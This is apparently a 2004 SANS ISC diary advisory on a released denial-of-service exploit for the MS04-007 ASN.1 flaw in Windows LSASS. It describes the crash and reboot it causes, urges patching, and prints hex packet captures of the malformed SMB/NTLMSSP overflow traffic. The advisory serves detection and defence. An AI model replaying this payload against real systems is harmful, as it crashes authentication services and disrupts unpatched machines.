Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

MS04-007 Exploit released

Published: 2004-02-14
Last Updated: 2004-02-15 03:31:54 UTC
by Mike Poor (Version: 1)
0 comment(s)
Happy Valentines Day!

A DOS exploit has been made available using the ASN.1 bug (MS04-007). This exploit uses port 445, 139 or 135. While this is just a DOS exploit, more serious exploits may follow soon.

Note: This Exploit appears to work only against Windows 2000 Professional. Dont forget history, it wasnt long after Dcom came out, that we saw universal shellcode for almost all windows platforms.


This may be your last chance to apply the patch!

(See yesterday's diary for more details regarding ASN.1)



The exploit kills lsass.exe (see definition below), fires an error message to the screen, and reboots the machine after approximately 1 minute.


According to: Liutilitilies.com ( http://www.liutilities.com/products/wintaskspro/processlibrary/lsass/ ) Lsass is:


Process File: lsass or lsass.exe

Process Name: Local Security Authority Service

Description: Windows Local Security Authority Server Process handles Windows security mechanisms. It verifies the validity of user logons to your computer or server. Technically, the software generates the process that is responsible for authenticating users for the Winlogon service.

Below are screen captures from the error log and lsass crash message:


http://isc.sans.org/images/lsasspopup.gif

http://isc.sans.org/images/errorlog.gif




20:26:04.281879 192.168.1.13.1087 > 192.168.1.11.139: tcp 1460 (DF) (ttl 128, id 438, len 1500)
0x0000 4500 05dc 01b6 4000 8006 6ffd c0a8 010d E.....@...o.....
0x0010 c0a8 010b 043f 008b e01c 2816 ab83 5c57 .....?....(...\W
0x0020 5010 4413 cd30 0000 0000 0885 ff53 4d42 P.D..0.......SMB
0x0030 7300 0000 0008 01c8 0000 0000 0000 0000 s...............
0x0040 0000 0000 0000 7503 0000 0300 0cff 0000 ......u.........
0x0050 00ff ff02 0001 0000 0000 0033 0800 0000 ...........3....
0x0060 005c 0000 804a 0860 8208 2f06 062b 0601 .\...J.`../..+..
0x0070 0505 02a0 8208 2330 8208 1fa0 0e30 0c06 ......#0.....0..
0x0080 0a2b 0601 0401 8237 0202 0aa1 0523 0303 .+.....7.....#..
0x0090 0107 a282 0804 0482 0800 4e54 4c4d 5353 ..........NTLMSS
0x00a0 5000 0100 0000 1502 0860 0900 0900 2000 P........`......
0x00b0 0000 0700 0700 2900 0000 574f 524b 4752 ......)...WORKGR
0x00c0 4f55 5044 4546 4155 4c54 4141 4141 4141 OUPDEFAULTAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0300 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0310 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0320 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0330 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0340 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0350 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0360 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0370 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0380 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0390 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
.....
Snip ... ending with this packet:
20:26:04.282134 192.168.1.13.1087 > 192.168.1.11.139: tcp 725 (DF) (ttl 128, id 439, len 765)
0x0000 4500 02fd 01b7 4000 8006 72db c0a8 010d E.....@...r.....
0x0010 c0a8 010b 043f 008b e01c 2dca ab83 5c57 .....?....-...\W
0x0020 5018 4413 4eef 0000 4141 4141 4141 4141 P.D.N...AAAAAAAA
0x0030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0070 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0080 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 0055 006e 0069 0078 0000 AAAAAA.U.n.i.x..
0x02f0 0053 0061 006d 0062 0061 0000 00 .S.a.m.b.a...


Handler on Duty: Mike Poor [ mike@intelguardians.com ]
Keywords:
0 comment(s)
Diary Archives